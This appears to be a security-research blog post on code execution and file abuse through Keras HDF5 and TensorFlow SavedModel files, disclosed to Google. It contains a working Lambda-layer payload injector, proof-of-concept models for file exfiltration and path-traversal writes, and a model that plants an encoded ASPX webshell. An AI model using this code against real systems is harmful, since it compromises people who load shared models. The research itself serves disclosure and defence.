Introduction

Throughout our previous blogs investigating the threats surrounding machine learning model storage formats, we’ve focused heavily on PyTorch models: specifically, how they can be abused to perform arbitrary code execution, from deploying ransomware, Cobalt Strike, and Mythic C2 loaders to spawning reverse shells and employing steganography. Although some of the attacks covered in our research are known to a select few developers and security professionals, it is our intention to publicize them further, so that ML practitioners can better evaluate the risks and security implications of their day-to-day operations.

In our latest research, we decided to shift focus from PyTorch to another popular machine learning library, TensorFlow, and uncover how models saved using TensorFlow’s SavedModel format, as well as Keras’s HDF5 format, could potentially be abused by hackers.

Keras

Keras is a hugely popular machine learning framework developed using Python, which runs atop the TensorFlow machine learning platform and provides a high-level API to facilitate constructing, training, and saving models. Pre-trained models developed using Keras can be saved in a format called HDF5 (Hierarchical Data Format version 5), that “supports large, complex, heterogeneous data” and is used to serialize the layers, weights, and biases for a neural network. The HDF5 storage format is well-developed and relatively secure, being overseen by the HDF Group, with a large user base encompassing industry and scientific research. 
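
To ground the discussion, here is a minimal sketch of how a Keras model ends up in an HDF5 file; the layer sizes and filename are arbitrary choices for illustration:

import tensorflow as tf

# A small, benign Keras model saved in HDF5 format (the .h5 extension
# selects the HDF5 serializer)
model = tf.keras.Sequential([
    tf.keras.layers.Dense(16, activation="relu", input_shape=(4,)),
    tf.keras.layers.Dense(1, activation="sigmoid"),
])
model.save("model.h5")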

We therefore started to wonder: would it be possible to perform arbitrary code execution via Keras models saved in the HDF5 format, in much the same way as with PyTorch?

Security researchers have discovered vulnerabilities that may be leveraged to perform code execution via HDF5 files. For example, Talos published a report in August 2022 highlighting weaknesses in the HDF5 GIF image file parser leading to three CVEs. However, while looking through the Keras code, we discovered an easier route to performing code injection in the form of a Keras API that allows a “Lambda layer” to be added to a model.

Code Execution via Lambda

The Keras documentation on Lambda layers states:

The Lambda layer exists so that arbitrary expressions can be used as a Layer when constructing Sequential and Functional API models. Lambda layers are best suited for simple operations or quick experimentation.

Keras Lambda layers have the following prototype, which allows for a Python function/lambda to be specified as input, as well as any required arguments:

tf.keras.layers.Lambda(
    function, output_shape=None, mask=None, arguments=None, **kwargs
)
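
In normal use, a Lambda layer simply wraps a small Python function or lambda into a model; a benign example might look like the following (layer sizes are arbitrary):

import tensorflow as tf

# A harmless Lambda layer that doubles the output of the previous layer
model = tf.keras.Sequential([
    tf.keras.layers.Dense(8, input_shape=(4,)),
    tf.keras.layers.Lambda(lambda x: x * 2),
])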

Delving deeper into the Keras library to determine how Lambda layers are serialized when saving a model, we noticed that the underlying code uses Python’s marshal.dumps to serialize the Python code supplied via the function parameter of tf.keras.layers.Lambda. When an HDF5 model containing a Lambda layer is loaded, the Python code is deserialized using marshal.loads, which decodes the byte-stream (essentially the contents of a .pyc file) into a code object that is subsequently executed.
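
The mechanism is easy to reproduce in isolation: marshal will happily round-trip a function’s code object, and whoever reconstructs it can execute whatever bytecode it contains. The snippet below is our simplified sketch of the principle, not the exact Keras serialization code:

import marshal
import types

def payload(x):
    print("arbitrary code runs here")
    return x

# "Saving": serialize the function's compiled bytecode
blob = marshal.dumps(payload.__code__)

# "Loading": deserialize and rebuild a callable from the byte-stream
restored = types.FunctionType(marshal.loads(blob), globals())
restored(1)  # prints "arbitrary code runs here"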

Much like the pickle module, the marshal module carries a big red warning in the Python documentation about usage with untrusted input: “Never unmarshal data received from an untrusted or unauthenticated source.”

In a similar vein to our previous Pickle code injection PoC, we’ve developed a simple script that can be used to inject Lambda layers into an existing Keras/HDF5 model:

"""Inject a Keras Lambda function into an HDF5 model"""
import osimport argparseimport shutil
from pathlib import Path
import tensorflow as tf
parser = argparse.ArgumentParser(description="Keras Lambda Code Injection")parser.add_argument("path", type=Path)parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])parser.add_argument("args")parser.add_argument("-v", "--verbose",                    help="verbose logging", action="count")
args = parser.parse_args()
command_args = args.args
if os.path.isfile(command_args):    with open(command_args, "r") as in_file:        command_args = in_file.read()
def Exec(dummy, command_args):    if "keras_lambda_inject" not in globals():        exec(command_args)
def Eval(dummy, command_args):    if "keras_lambda_inject" not in globals():        eval(command_args)
def System(dummy, command_args):    if "keras_lambda_inject" not in globals():        import os        os.system(command_args)
def Runpy(dummy, command_args):    if "keras_lambda_inject" not in globals():        import runpy        runpy._run_code(command_args,{})
# Construct payloadif args.command == "system":    payload = tf.keras.layers.Lambda(System, name=args.command, arguments={"command_args":command_args})elif args.command == "exec":    payload = tf.keras.layers.Lambda(Exec, name=args.command, arguments={"command_args":command_args})elif args.command == "eval":    payload = tf.keras.layers.Lambda(Eval, name=args.command, arguments={"command_args":command_args})elif args.command == "runpy":    payload = tf.keras.layers.Lambda(Runpy, name=args.command, arguments={"command_args":command_args})
# Save a backup of the modelbackup_path = "{}.bak".format(args.path)shutil.copyfile(args.path, backup_path)
# Insert the Lambda payload into the modelhdf5_model = tf.keras.models.load_model(args.path)hdf5_model.add(payload)hdf5_model.save(args.path)

keras_inject.py

The above script allows for payloads to be inserted into a Lambda layer that will execute code or commands via os.system, exec, eval, or runpy._run_code. As a quick demonstration, let’s use exec to print out a message when a model is loaded:

> python keras_inject.py model.h5 exec "print('This model has been hijacked!')"

To execute the payload, simply loading the model is sufficient:

> python
>>> import tensorflow as tf
>>> tf.keras.models.load_model("model.h5")
This model has been hijacked!

Success!

Whilst researching this code execution method, we discovered a Keras HDF5 model containing a Lambda function that was uploaded to VirusTotal on Christmas day 2022 from a user in Russia who was not logged in. Looking into the structure of the model file, named exploit.h5, we can observe the Lambda function encoded using base64:

{
   "class_name":"Lambda",
   "config":{
      "name":"lambda",
      "trainable":true,
      "dtype":"float32",
      "function":{
         "class_name":"__tuple__",
         "items":[
            "4wEAAAAAAAAAAQAAAAQAAAATAAAAcwwAAAB0AHwAiACIAYMDUwApAU4pAdoOX2ZpeGVkX3BhZGRp\nbmcpAdoBeCkC2gtrZXJuZWxfc2l6ZdoEcmF0ZakA+m5DOi9Vc2Vycy90YW5qZS9BcHBEYXRhL1Jv\nYW1pbmcvUHl0aG9uL1B5dGhvbjM3L3NpdGUtcGFja2FnZXMvb2JqZWN0X2RldGVjdGlvbi9tb2Rl\nbHMva2VyYXNfbW9kZWxzL3Jlc25ldF92MS5wedoIPGxhbWJkYT5lAAAA8wAAAAA=\n",
            null,
            {
               "class_name":"__tuple__",
               "items":[
                  7,
                  1
               ]

After decoding the base64 and using marshal.loads to decode the compiled Python, we can use dis.dis to disassemble the object and dis.show_code to display further information:
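
The decoding steps look roughly like this (variable names are ours; encoded stands for the base64 string taken from the "function" entry in the model config above):

import base64
import dis
import marshal

# Rebuild the code object from the base64-encoded marshal byte-stream
code = marshal.loads(base64.b64decode(encoded))

dis.dis(code)        # disassemble the bytecode
dis.show_code(code)  # display metadata: names, constants, filename, ...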

 28           0 LOAD_CONST               1 (0)
              2 LOAD_CONST               0 (None)
              4 IMPORT_NAME              0 (os)
              6 STORE_FAST               1 (os)

 29           8 LOAD_GLOBAL              1 (print)
             10 LOAD_CONST               2 ('INFECTED')
             12 CALL_FUNCTION            1
             14 POP_TOP

 30          16 LOAD_FAST                0 (x)
             18 RETURN_VALUE

Output from dis.dis()

Name:              exploit
Filename:          infected.py
Argument count:    1
Positional-only arguments: 0
Kw-only arguments: 0
Number of locals:  2
Stack size:        2
Flags:             OPTIMIZED, NEWLOCALS, NOFREE
Constants:
   0: None
   1: 0
   2: 'INFECTED'
Names:
   0: os
   1: print
Variable names:
   0: x
   1: os

Output from dis.show_code()

The above payload simply prints the string “INFECTED” before returning, and is clearly intended to test the mechanism; it was likely uploaded to VirusTotal by a researcher to test the detection efficacy of anti-virus products.

It is worth noting that since December 2022, code has been added to Keras that prevents Lambda layers from being deserialized unless “safe mode” is explicitly disabled; however, this method still works in the latest release at the time of publication, version 2.11.0, from 8 November 2022.
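
In releases that ship the change, loading looks something like the sketch below; note that the safe_mode argument only exists in later Keras versions, and how thoroughly it covers legacy HDF5 files depends on the release:

import tensorflow as tf

# With safe mode enabled (the default in newer releases), deserializing a
# Lambda layer should raise an error instead of executing marshalled bytecode
model = tf.keras.models.load_model("model.h5", safe_mode=True)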

TensorFlow

Next, we delved deeper into the TensorFlow library to see if it might use pickle, marshal, exec, or any other generally unsafe Python functionality. 

At this point, it is worth discussing the two modes in which TensorFlow can operate: eager mode and graph mode.

When running in eager mode, TensorFlow will execute operations immediately, as they are called, in a similar fashion to running Python code. This makes it easier to experiment and debug code, as results are computed immediately. Eager mode is useful for experimentation, learning, and understanding TensorFlow’s operations and APIs.

Graph mode, on the other hand, is a mode of operation whereby operations are not executed straight away but instead are added to a computational graph. The graph represents the sequence of operations to be executed and can be optimized for speed and efficiency. Once a graph is constructed, it can be run on one or more devices, such as CPUs or GPUs, to execute the operations. Graph mode is typically used for production deployment, as it can achieve better performance than eager mode for complex models and large datasets.
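
The difference is easiest to see with tf.function, which traces Python code into a reusable graph; a minimal illustration:

import tensorflow as tf

# Eager mode: the operation runs immediately and returns a concrete value
print(tf.constant(1) + tf.constant(2))

# Graph mode: tf.function traces the Python body into a computation graph,
# which can later be saved, optimized, and executed without the original Python
@tf.function
def add(a, b):
  return a + b

print(add(tf.constant(1), tf.constant(2)))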

With this in mind, any attack is best focused on graph mode: not all code and operations used in eager mode can be stored in a TensorFlow model, and it is the resulting computation graph that may be shared with other people for use in their own training and inference scenarios.

Under the hood, TensorFlow models are stored using the “SavedModel” format, which uses Google’s Protocol Buffers to store the data associated with the model, as well as the computational graph. A SavedModel provides a portable, platform-independent means of executing the “graph” outside of a Python environment (language agnostically). While it is possible to use a TensorFlow operation that executes Python code, such as tf.py_function, this operation will not persist to the SavedModel, and only works in the same address space as the Python program that invokes it when running in eager mode.
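
To illustrate why tf.py_function is of little use to an attacker, consider the sketch below (module and directory names are ours): the Python body of the py_function is never serialized into the SavedModel, so the exported graph cannot run it outside the process that defined it.

import tensorflow as tf

class PyFuncModule(tf.Module):
  @tf.function(input_signature=[tf.TensorSpec([], tf.float32)])
  def __call__(self, x):
    # The lambda below lives only in this Python process; the SavedModel
    # records a reference to it, not the code itself
    return tf.py_function(lambda t: t + 1.0, [x], tf.float32)

tf.saved_model.save(PyFuncModule(), "pyfunc_demo")
# Running the exported graph elsewhere (e.g. via saved_model_cli or TF Serving)
# fails, because the Python function was never persisted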

So whilst it isn’t possible to execute arbitrary Python code directly from a “SavedModel” when operating in graph mode, the SECURITY.md file encouraged us to probe further:

TensorFlow models are programs
TensorFlow models (to use a term commonly used by machine learning practitioners) are expressed as programs that TensorFlow executes. TensorFlow programs are encoded as computation graphs. The model’s parameters are often stored separately in checkpoints.
At runtime, TensorFlow executes the computation graph using the parameters provided. Note that the behavior of the computation graph may change depending on the parameters provided. TensorFlow itself is not a sandbox. When executing the computation graph, TensorFlow may read and write files, send and receive data over the network, and even spawn additional processes. All these tasks are performed with the permission of the TensorFlow process. Allowing for this flexibility makes for a powerful machine learning platform, but it has security implications.

The part about reading/writing files immediately got our attention, so we started to explore the underlying storage mechanisms and TensorFlow operations more closely. 

As it transpires, TensorFlow provides a feature-rich set of operations for working with models, layers, tensors, images, strings, and even file I/O that can be executed via a graph when running a SavedModel. We started speculating as to how an adversary might abuse these mechanisms to perform real-world attacks, such as code execution and data exfiltration, and decided to test some approaches.

Exfiltration via ReadFile

First up was tf.io.read_file, a simple I/O operation that allows the caller to read the contents of a file into a tensor. Could this be used for data exfiltration?

As a very simple test, using a tf.function that gets compiled into the network graph (and therefore persists to the graph within a SavedModel), we crafted a module that would read a file, secret.txt, from the file system and return it:

import tensorflow as tf


class ExfilModel(tf.Module):
  @tf.function
  def __call__(self, input):
    return tf.io.read_file("secret.txt")


model = ExfilModel()
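
For the graph, including the ReadFile op, to persist, the module needs to be exported with a serving signature; a minimal sketch (the directory name and scalar input spec are our assumptions, chosen to match the command below):

# Export the traced graph with an explicit serving signature so it can be
# fed an "input" value at run time
tf.saved_model.save(
    model,
    "tf2-exfil",
    signatures=model.__call__.get_concrete_function(
        tf.TensorSpec(shape=[], dtype=tf.float32, name="input")),
)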

When the model is saved using the SavedModel format, we can use the “saved_model_cli” to load and run the model with input:

> saved_model_cli run --dir .\tf2-exfil\ --signature_def serving_default --tag_set serve --input_exprs "input=1"
Result for output key output:
b'Super secret!'

This yields our “Super secret!” message from secret.txt, but it isn’t very practical. Not all inference APIs will return tensors, and we may only receive a prediction class from certain models, so we cannot always return full file contents.

However, it is possible to use other operations, such as tf.strings.substr or tf.slice, to extract a portion of a string/tensor and leak it byte by byte in response to certain inputs. We have crafted a model to do just that, based on a popular computer vision model architecture, which will exfiltrate data in response to specific image files, although this is left as an exercise for the reader!
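
As a much simplified sketch of the idea (and not the computer vision model referred to above), a graph can return a single byte of the file selected by the caller’s input, allowing the contents to be reassembled over many requests:

import tensorflow as tf

class ByteLeakModel(tf.Module):
  @tf.function(input_signature=[tf.TensorSpec([], tf.int32)])
  def __call__(self, index):
    secret = tf.io.read_file("secret.txt")
    # Return one byte of the file per call, selected by the input index
    return tf.strings.substr(secret, index, 1)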

Code Execution via WriteFile

Next up, we investigated tf.io.write_file, another simple I/O operation that allows the caller to write data to a file. While intended for string scalars stored in tensors, it is trivial to pass binary strings to the function, and, even more helpfully, it can be combined with tf.io.decode_base64 to decode base64-encoded data.

class DropperModel(tf.Module):
  @tf.function
  def __call__(self, input):
    tf.io.write_file("dropped.txt", tf.io.decode_base64("SGVsbG8h"))
    return input + 2


model = DropperModel()

If we save this model as a TensorFlow SavedModel, and again load and run it using “saved_model_cli”, we will end up with a file on the filesystem called “dropped.txt” containing the message “Hello!”.

Things start to get interesting when you factor in directory traversal (somewhat akin to the Zip Slip Vulnerability). In theory (although you would never run TensorFlow as root, right?!), it would be possible to overwrite existing files on the filesystem, such as SSH authorized_keys, or compiled programs or scripts:

class DropperModel(tf.Module):
  @tf.function
  def __call__(self, input):
    tf.io.write_file("../../bad.sh", tf.io.decode_base64("ZWNobyBwd25k"))
    return input + 2


model = DropperModel()

For a targeted attack, having the ability to conduct arbitrary file writes can be a powerful means of performing an initial compromise or in certain scenarios privilege escalation.

Directory Traversal via MatchingFiles

We also uncovered the tf.io.matching_files operation, which operates much like the glob function in Python, allowing the caller to obtain a listing of files within a directory. The matching files operation supports wildcards, and when combined with the read and write file operations, it can be used to make attacks performing data exfiltration or dropping files on the file system more powerful.

The following example highlights the possibility of using matching files to enumerate the filesystem and locate .aspx files (with the help of the tf.strings.regex_full_match operation) and overwrite any files found with a webshell that can be remotely operated by an attacker:

import tensorflow as tf


def walk(pattern, depth):
  if depth > 16:
    return
  files = tf.io.matching_files(pattern)
  if tf.size(files) > 0:
    for f in files:
      walk(tf.strings.join([f, "/*"]), depth + 1)
      if tf.strings.regex_full_match([f], r".*\.aspx")[0]:
        tf.print(f)
        # The base64 below decodes to a minimal Jscript ASPX webshell
        tf.io.write_file(f, tf.io.decode_base64("PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiJT48JWV2YWwoUmVxdWVzdC5Gb3JtWyJDb21tYW5kIl0sInVuc2FmZSIpOyU-"))


class WebshellDropper(tf.Module):
  @tf.function
  def __call__(self, input):
    walk(["../../../../../../../../../../../../*"], 0)
    return input + 1


model = WebshellDropper()

Impact

The above techniques can be leveraged by creating TensorFlow models that, when shared and run, could allow an attacker to:

  • Replace binaries and either invoke them remotely or wait for them to be invoked by TensorFlow or some other task running on the system
  • Replace web pages to insert a webshell that can be operated remotely
  • Replace Python files used by TensorFlow to execute malicious code

It might also be possible for an attacker to:

  • Enumerate the filesystem to read and exfiltrate sensitive information (such as training data) via an inference API
  • Overwrite system binaries to perform privilege escalation
  • Poison training data on the filesystem
  • Craft a destructive filesystem wiper
  • Construct a crude ransomware capable of encrypting files (by supplying encryption keys via an inference API and encrypting files using TensorFlow’s math and I/O operations)

In the interest of responsible disclosure, we reported our concerns to Google, who swiftly responded:

Hi! We’ve decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.

Users are recommended to run untrusted models in a sandbox.

Please feel free to publicly disclose this issue on GitHub as a public issue.

Conclusions

It’s becoming more apparent that machine learning models are not inherently secure, either through poor development choices, in the case of pickle and marshal usage, or by design, as with TensorFlow models functioning as a “program”. And we’re starting to see more abuse from adversaries, who will not hesitate to exploit these weaknesses to suit their nefarious aims, from initial compromise to privilege escalation and data exfiltration.

Despite the response from Google, not everyone will routinely run third-party models in a sandbox (although you almost certainly should). And even so, this may still offer an avenue for attackers to perform malicious actions within sandboxes and containers to which they wouldn’t ordinarily have access, including exfiltration and poisoning of training sets. It’s worth remembering that containers don’t contain, and sandboxes may be filled with more than just sand!

Now more than ever, it is imperative to ensure machine learning models are free from malicious code, operations and tampering before usage. However, with current anti-virus and endpoint detection and response (EDR) software lacking in scrutiny of ML artifacts, this can be challenging.